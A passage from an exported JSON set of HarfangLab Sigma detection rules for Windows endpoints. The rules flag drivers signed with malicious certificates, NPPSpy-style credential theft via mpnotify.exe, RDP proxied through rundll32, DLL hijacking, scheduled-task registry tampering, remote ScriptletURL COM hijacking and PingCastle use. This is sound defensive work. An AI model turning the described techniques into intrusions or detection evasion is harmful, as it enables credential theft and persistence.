Bhd.\n - '29338264019B62D11F9C6C4B5A69B78B899B4DF6' # ECHO INFINI SDN. BHD.\n - '17F77710C888E30917F71F7909086BCC2D131F61' # Byte Media Sdn. Bhd.\n - '7533D9D9C5241D0E031C21304C6A3FF064F79072' # ECHO INFINI SDN. BHD.\n - '3B5253A4853056458675B5CB1903C05BC2DBBD1B' # BLACK INDIGO LTD\n - '76C675514EEC3A27A4E551A77ED30FBB0DC43A01' # Summit Nexus Holdings LLC\n # https://www.virustotal.com/gui/file/f9dd0b57a5c133ca0c4cab3cca1ac8debdc4a798b452167a1e5af78653af00c1\n - '9A6EE51A6A437603ACEE9ADC5F1A5F13329A7E59'\n # https://securelist.com/honeymyte-kernel-mode-rootkit/118590/\n # https://www.virustotal.com/gui/file/dc8b123d91a29661c92b0de3d4f06e0ca17b0633b87e45c09245d82bb84f3860\n - '1F33285626E81F4845936C7A2A55A46F6DADA651'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1b15c2a0-d1d2-4628-a592-e6c9c314baff",
"rule_name": "Driver Loaded Signed with Malicious Certificate",
"rule_description": "Detects the loading of drivers signed with a certificate that was used by malicious actors.\nThis can be indicative of a malicious actor trying to evade EDR/AV solutions with a forged signature.\nIt is recommended to analyze the loaded driver for malicious contents.\n",
"rule_creation_date": "2022-07-21",
"rule_modified_date": "2025-12-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1b1d99a0-6099-42fb-91b2-87fead258765",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071746Z",
"creation_date": "2026-03-23T11:45:34.071748Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071752Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.scip.ch/en/?labs.20220217",
"https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
"https://attack.mitre.org/techniques/T1556/008/"
],
"name": "t1556_008_file_dropped_mpnotify.yml",
"content": "title: File Written to Disk by mpnotify.exe\nid: 1b1d99a0-6099-42fb-91b2-87fead258765\ndescription: |\n Detects when a file is written to disk by the mpnotify process.\n This may be a consequence of an attacker trying to access users' credentials using a malicious Network Provider.\n It is recommended to investigate the content of the written file, the DLL loaded by the mpnotify process to look for unsigned libraries, as well as indicators of a Network Provider installation.\nreferences:\n - https://www.scip.ch/en/?labs.20220217\n - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy\n - https://attack.mitre.org/techniques/T1556/008/\ndate: 2023/08/08\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1556.008\n - attack.t1112\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image|endswith: '\\mpnotify.exe'\n\n exclusion_citrix:\n Path:\n - '?:\\Program Files\\Citrix\\Secure Access Client\\logs\\nsnp.txt'\n - '?:\\Program Files (x86)\\Citrix\\Secure Access Client\\logs\\nsnp.txt'\n - '?:\\ProgramData\\Citrix\\AGEE\\nsnp.txt'\n - '?:\\Program Files\\Citrix\\Secure Access Client\\logs\\csa_nsnp.txt'\n - '?:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Citrix\\AGEE\\config.js'\n\n exclusion_dell:\n Path: '?:\\Windows\\Temp\\14ADCEAA-576A-45E5-94B5-EE925ED3E963'\n\n exclusion_novell:\n # https://beta.novell.com/documentation/zenworks-2020/zen_fde_agent/data/bryok2g.html\n Path:\n - '*\\PBA.log'\n - '*\\FDE.log'\n - '?:\\Windows\\System32\\ZCredMgr.LOG'\n - '?:\\Windows\\System32\\ZenCredManager.LOG'\n\n exclusion_crypto_key:\n Path:\n - '?:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\3310a4fa6cb9c60504498d7eea986fc2_????????-????-????-????-????????????'\n - '?:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\a398a5cd31e2b6b587ab0b426ca6dc4d_????????-????-????-????-????????????'\n - '?:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\a398a5cd31e2b6b587ab0b426ca6dc4d_????????-????-????-????-????????????'\n\n exclusion_f5:\n Path: '?:\\Windows\\Temp\\f5netprov.txt'\n\n exclusion_windhawk:\n Path: '?:\\ProgramData\\Windhawk\\Engine\\ModsWritable\\mod-task\\\\*_slick-window-arrangement'\n\n exclusion_zsso:\n Path|startswith: '?:\\Windows\\Temp\\zsso\\ZCredentialManager'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1b1d99a0-6099-42fb-91b2-87fead258765",
"rule_name": "File Written to Disk by mpnotify.exe",
"rule_description": "Detects when a file is written to disk by the mpnotify process.\nThis may be a consequence of an attacker trying to access users' credentials using a malicious Network Provider.\nIt is recommended to investigate the content of the written file, the DLL loaded by the mpnotify process to look for unsigned libraries, as well as indicators of a Network Provider installation.\n",
"rule_creation_date": "2023-08-08",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1556.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1b3ebc5b-072e-4731-938e-df8d4ab5c802",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083394Z",
"creation_date": "2026-03-23T11:45:34.083397Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083401Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
"https://attack.mitre.org/techniques/T1021/001/"
],
"name": "t1021_001_unusual_process_rdp.yml",
"content": "title: RDP Connection Initiated by Unusual Process\nid: 1b3ebc5b-072e-4731-938e-df8d4ab5c802\ndescription: |\n Detects an RDP connection initiated by an unusual process.\n Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\n Attackers can proxying RDP traffic via a legitimate windows process such as RunDLL32 to reduce the exposure of their own infrastructure and evade detection.\n It is recommended to analyze the context and user around this RDP connection to determine if this connection is the result of legitimate administrative operations.\nreferences:\n - https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1021/001/\ndate: 2024/02/22\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n DestinationPort: '3389'\n ProcessOriginalFileName: 'rundll32.exe'\n Initiated: 'true'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1b3ebc5b-072e-4731-938e-df8d4ab5c802",
"rule_name": "RDP Connection Initiated by Unusual Process",
"rule_description": "Detects an RDP connection initiated by an unusual process.\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\nAttackers can proxying RDP traffic via a legitimate windows process such as RunDLL32 to reduce the exposure of their own infrastructure and evade detection.\nIt is recommended to analyze the context and user around this RDP connection to determine if this connection is the result of legitimate administrative operations.\n",
"rule_creation_date": "2024-02-22",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1b4396df-ab50-493f-8787-8ca376e71f09",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619180Z",
"creation_date": "2026-03-23T11:45:34.619182Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619186Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/",
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wsmprovhost.yml",
"content": "title: DLL Hijacking via wsmprovhost.exe\nid: 1b4396df-ab50-493f-8787-8ca376e71f09\ndescription: |\n Detects potential Windows DLL Hijacking via wsmprovhost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wsmprovhost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DSROLE.dll'\n - '\\mi.dll'\n - '\\miutils.dll'\n - '\\wsmsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1b4396df-ab50-493f-8787-8ca376e71f09",
"rule_name": "DLL Hijacking via wsmprovhost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wsmprovhost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1b45b5ab-100f-4546-9d16-1e8f6b6cb22b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078559Z",
"creation_date": "2026-03-23T11:45:34.078561Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078565Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/netero1010/GhostTask",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1112_scheduled_task_updated_registry.yml",
"content": "title: Scheduled Task Actions Updated via Registry Modification\nid: 1b45b5ab-100f-4546-9d16-1e8f6b6cb22b\ndescription: |\n Detects the update of scheduled task actions via a manual registry modification.\n Scheduled tasks are often used by attackers as persistence mechanisms.\n To evade detection, they can update an existing scheduled task through a registry key manipulation, however, SYSTEM privileges are required.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://github.com/netero1010/GhostTask\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2024/01/04\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\\\*\\Actions'\n ProcessImage|contains: '\\'\n\n filter_scheduler:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs' # windows 7\n - '?:\\windows\\system32\\svchost.exe -k netsvcs -s Schedule' # Windows 10 1703\n\n exclusion_windeploy:\n ProcessCommandLine:\n - '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe /preoobe'\n - '?:\\Windows\\System32\\oobe\\Setup.exe'\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\windeploy.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1b45b5ab-100f-4546-9d16-1e8f6b6cb22b",
"rule_name": "Scheduled Task Actions Updated via Registry Modification",
"rule_description": "Detects the update of scheduled task actions via a manual registry modification.\nScheduled tasks are often used by attackers as persistence mechanisms.\nTo evade detection, they can update an existing scheduled task through a registry key manipulation, however, SYSTEM privileges are required.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2024-01-04",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1b63e7c7-7ee6-45a2-9107-662ddc98a824",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091179Z",
"creation_date": "2026-03-23T11:45:34.091181Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091186Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wowreg32.yml",
"content": "title: DLL Hijacking via wowreg32.exe\nid: 1b63e7c7-7ee6-45a2-9107-662ddc98a824\ndescription: |\n Detects potential Windows DLL Hijacking via wowreg32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wowreg32.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\devrtl.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1b63e7c7-7ee6-45a2-9107-662ddc98a824",
"rule_name": "DLL Hijacking via wowreg32.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wowreg32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1b8277e3-f753-4c37-9719-e62bb969c2b3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627150Z",
"creation_date": "2026-03-23T11:45:34.627152Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627156Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2020/05/20/persistence-com-hijacking/",
"https://github.com/LOLBAS-Project/LOLBAS/blob/master/Archive-Old-Version/OSScripts/Slmgr.vbs.md",
"https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/",
"https://attack.mitre.org/techniques/T1216/",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1546/015/"
],
"name": "t1216_com_hijacking_remote_scriptlet_registry.yml",
"content": "title: Registry ScriptletURL Modified\nid: 1b8277e3-f753-4c37-9719-e62bb969c2b3\ndescription: |\n Detects the registration of a remote Windows Scripting Components via the ScriptletURL registry key.\n This key defines the remote location of the arbitrary .sct file that will be downloaded and executed when the related COM class will be invoked.\n Attackers can use a remote malicious scriptlet to achieve persistence and evade detection.\n It is recommended to check for other suspicious activities by the process making the registry modification.\nreferences:\n - https://pentestlab.blog/2020/05/20/persistence-com-hijacking/\n - https://github.com/LOLBAS-Project/LOLBAS/blob/master/Archive-Old-Version/OSScripts/Slmgr.vbs.md\n - https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/\n - https://attack.mitre.org/techniques/T1216/\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2022/11/14\nmodified: 2026/02/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - attack.t1112\n - attack.persistence\n - attack.t1546.015\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\CLSID\\{????????-????-????-????-????????????}\\ScriptletURL\\(Default)'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_setuphost:\n ProcessParentImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n\n exclusion_dismhost:\n ProcessImage: '?:\\windows\\temp\\\\????????-????-????-????-????????????\\dismhost.exe'\n\n exclusion_tiworker:\n ProcessImage: '?:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\tiworker.exe'\n\n exclusion_update:\n ProcessImage: '?:\\Windows\\System32\\poqexec.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1b8277e3-f753-4c37-9719-e62bb969c2b3",
"rule_name": "Registry ScriptletURL Modified",
"rule_description": "Detects the registration of a remote Windows Scripting Components via the ScriptletURL registry key.\nThis key defines the remote location of the arbitrary .sct file that will be downloaded and executed when the related COM class will be invoked.\nAttackers can use a remote malicious scriptlet to achieve persistence and evade detection.\nIt is recommended to check for other suspicious activities by the process making the registry modification.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1216",
"attack.t1546.015"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1b864817-8a01-4cfe-9481-20ce115320c8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296790Z",
"creation_date": "2026-03-23T11:45:35.296792Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296797Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.pingcastle.com/",
"https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/"
],
"name": "t1087_002_pingcastle.yml",
"content": "title: PingCastle Execution\nid: 1b864817-8a01-4cfe-9481-20ce115320c8\ndescription: |\n Detects the execution of PingCastle.\n PingCastle is a tool providing Active Directory security indicators and is often used by attackers during reconnaissance phase to find Active Directory vulnerabilities.\n This tool is often used for legitimate purposes. It is recommended to determine if the usage of this tool was warranted by the system administrators.\nreferences:\n - https://www.pingcastle.com/\n - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\ndate: 2023/03/20\nmodified: 2026/02/25\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - attack.t1482\n - attack.t1018\n - attack.t1615\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.PingCastle\n - classification.Windows.Behavior.ActiveDirectory\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'PingCastle.exe'\n - 'PingCastle.dll'\n\n condition: selection\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1b864817-8a01-4cfe-9481-20ce115320c8",
"rule_name": "PingCastle Execution",
"rule_description": "Detects the execution of PingCastle.\nPingCastle is a tool providing Active Directory security indicators and is often used by attackers during reconnaissance phase to find Active Directory vulnerabilities.\nThis tool is often used for legitimate purposes. It is recommended to determine if the usage of this tool was warranted by the system administrators.\n",
"rule_creation_date": "2023-03-20",
"rule_modified_date": "2026-02-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1087.002",
"attack.t1482",
"attack.t1615"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1c0971b5-dd3d-4802-967a-67f521f0ac2c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
